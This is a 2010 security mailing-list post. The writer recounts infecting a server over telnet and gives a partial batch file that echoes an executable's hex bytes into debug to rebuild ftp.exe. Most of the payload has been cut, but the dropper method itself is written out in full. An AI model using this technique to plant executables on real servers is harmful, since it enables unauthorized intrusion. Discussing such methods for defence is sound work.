Actually, I've infected a server via telnet before, by echoing hex strings to a text file, then using debug to convert to an exe. One could just as easily use any other executable...
<----contents of ftp.bat ----> @ECHO OFF>1 echo e 0100 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00>>1 echo e 0110 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00>>1 echo e 0120 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00>>1 echo e 0130 00 00 00 00 00 00 00 00 00 00 00 00 D0 00 00 00>>1 echo e 0140 0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68>>1 <---- Lines Deleted ----> echo e 44E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00>>1 echo e 44F0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00>>1 echo rcx>>1 echo 4400>>1 echo n ftp.sys>>1 echo w>>1 echo q>>1 debug<1>nul rename ftp.sys ftp.exe </----contents of ftp.bat ----> Joel Helgeson -----Original Message----- From: [email protected] [mailto:[email protected]] On Behalf Of Dan Kaminsky Sent: Friday, January 22, 2010 1:15 PM To: Vaughn, Randal L. Cc: [email protected]; Rich Kulawiec Subject: Re: [funsec] fog of cyberwar Actually, against telnet you just push the console echo attacks and kill the session. On Fri, Jan 22, 2010 at 8:03 PM, Vaughn, Randal L. <[email protected]> wrote: > telnet? > > On Jan 22, 2010, at 9:45 AM, Dan Kaminsky wrote: > >>>> IE should not be used anymore? What took you so long? >>> >>> Anybody still using IE doesn't deserve any help, any sympathy, any >>> support. They are deliberately setting themselves on fire -- so let >>> them burn. >> >> So which browser exactly is the secure one? >> >> _______________________________________________ >> Fun and Misc security discussion for OT posts. >> https://linuxbox.org/cgi-bin/mailman/listinfo/funsec >> Note: funsec is a public and open mailing list. > > _______________________________________________ Fun and Misc security discussion for OT posts. https://linuxbox.org/cgi-bin/mailman/listinfo/funsec Note: funsec is a public and open mailing list. _______________________________________________ Fun and Misc security discussion for OT posts. https://linuxbox.org/cgi-bin/mailman/listinfo/funsec Note: funsec is a public and open mailing list.
